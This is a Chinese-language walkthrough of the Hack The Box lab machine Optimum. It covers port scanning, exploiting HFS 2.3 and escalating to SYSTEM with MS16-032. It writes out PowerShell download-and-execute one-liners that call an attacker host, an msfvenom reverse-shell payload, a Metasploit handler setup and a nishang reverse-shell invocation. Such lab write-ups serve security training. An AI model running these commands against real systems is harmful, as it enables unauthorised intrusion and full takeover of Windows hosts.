抱歉,您的浏览器无法访问本站
本页面需要浏览器支持(启用)JavaScript
了解详情 >

HTB-Optimum

HTB

发布于:2023年8月22日

Information

nmap

首先进行全端口扫描

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~]
└─$ nmap -p- --min-rate 10000 10.10.10.8 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-22 07:09 EDT
Nmap scan report for 10.10.10.8
Host is up (0.28s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 47.19 seconds

根据开放端口,进行详细信息扫描。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 80 10.10.10.8       
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-22 07:12 EDT
Nmap scan report for 10.10.10.8
Host is up (0.28s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.32 seconds

web

访问80端口,页面信息如下

得知当前为HFS服务

WEB-GetShell

exploit-db找到了针对nfs的exploit,将exp保存到本地之后修改其中的ip和端口设置

然后使用python3执行脚本

可以直接获得powershell shell。

Privilege

Find vulnerabilities

这里因为系统版本为较早的旧版本,所以需要使用sherlock来找到可以利用的漏洞。

将Sherlock克隆到本地后,使用grep命令来搜索全部的方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/Documents/htb/Optimum/Sherlock]
└─$ grep -i function Sherlock.ps1
function Get-FileVersionInfo ($FilePath) {
function Get-InstalledSoftware($SoftwareName) {
function Get-Architecture {
function Get-CPUCoreCount {
function New-ExploitTable {
function Set-ExploitTable ($MSBulletin, $VulnStatus) {
function Get-Results {
function Find-AllVulns {
function Find-MS10015 {
function Find-MS10092 {
function Find-MS13053 {
function Find-MS13081 {
function Find-MS14058 {
function Find-MS15051 {
function Find-MS15078 {
function Find-MS16016 {
function Find-MS16032 {
function Find-MS16034 {
function Find-CVE20177199 {
function Find-MS16135 {

Find-AllVulns添加后ps1脚本的最后。

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Documents/htb/Optimum/Sherlock]
└─$ tail -5 Sherlock.ps1

    Set-ExploitTable $MSBulletin $VulnStatus

}
Find-AllVulns

本地开启http服务用来传输文件,在靶机的shell中使用IEX加载文件并执行

1
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.14/Sherlock.ps1')

查看sherlock的结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
PS C:\Users\kostas\Desktop> IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.14/Sherlock.ps1')                                                  
                                                                              
                                                                              
Title      : User Mode to Ring (KiTrap0D)                                     
MSBulletin : MS10-015                                                         
CVEID      : 2010-0232                                                        
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A                       
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable

存在漏洞的编号分别为MS16-032MS16-034MS16-135。选择利用MS16-032来进行提权。

Get system privilege

使用的脚本有empire项目中的Invoke-MS16032.ps1,将文件保存到工作目录并对其进行修改,在文件最后添加如下代码

1
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.14:808/shell.exe')"

调用Invoke-MS16032方法加载并执行shell.exe。shell.exe是通过msfvenom生成的shellcode

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Documents/htb/Optimum]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=3333 -f exe > shell.exe                                                            
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

通过msfconsole监听3333端口

1
2
3
4
5
6
7
8
9
10
11
12
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.14.14
lhost => 10.10.14.14
msf6 exploit(multi/handler) > set lport  3333
lport => 3333
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.14:3333

在靶机shell加载并执行Invoke-MS16032,在msfconsole监听的3333端口失败了

经过排查,确认可能存在的问题为当前shell为32位的,对64位系统内核进行检测会失败

为了解决这个问题,获得一个msf shell,将进程迁移至64位进程

拿到meterpreter shell后,通过ps命令查看进程信息,迁移至64位进程

1
2
3
4
5
6
7
8
9
10
11
12
meterpreter > migrate 2140
[*] Migrating from 2716 to 2140...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 3
Meterpreter     : x64/windows

进程迁移后再次提权。

修改Invoke-PowerShellTcp.ps1进行reverse shell,在最后一行添加

1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 4444

修改Invoke-MS16032.ps1 ,在最后添加如下代码,使其加载Invoke-PowershellTcp.ps1进行反弹shell

1
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.14:808/Invoke-PowerShellTcp.ps1')"

修改好文件之后,在本地监听4444端口。

在meterpreter shell中执行

1
powershell iex(New-Object Net.WebClient).DownloadString('http://10.10.14.14:808/Invoke-MS16032.ps1')

靶机执行powershell命令之后,本地http服务依次接收到/Invoke-MS16032.ps1和/Invoke-PowerShellTcp.ps1请求,最后在4444端口监听到system shell。

参考:

https://0xdf.gitlab.io/2021/03/17/htb-optimum.html

https://www.youtube.com/watch?v=kWTnVBIpNsE

更新于:2023年8月22日

HTB

Windows

HFS

MS16032

Sherlock

Msf

nishang

评论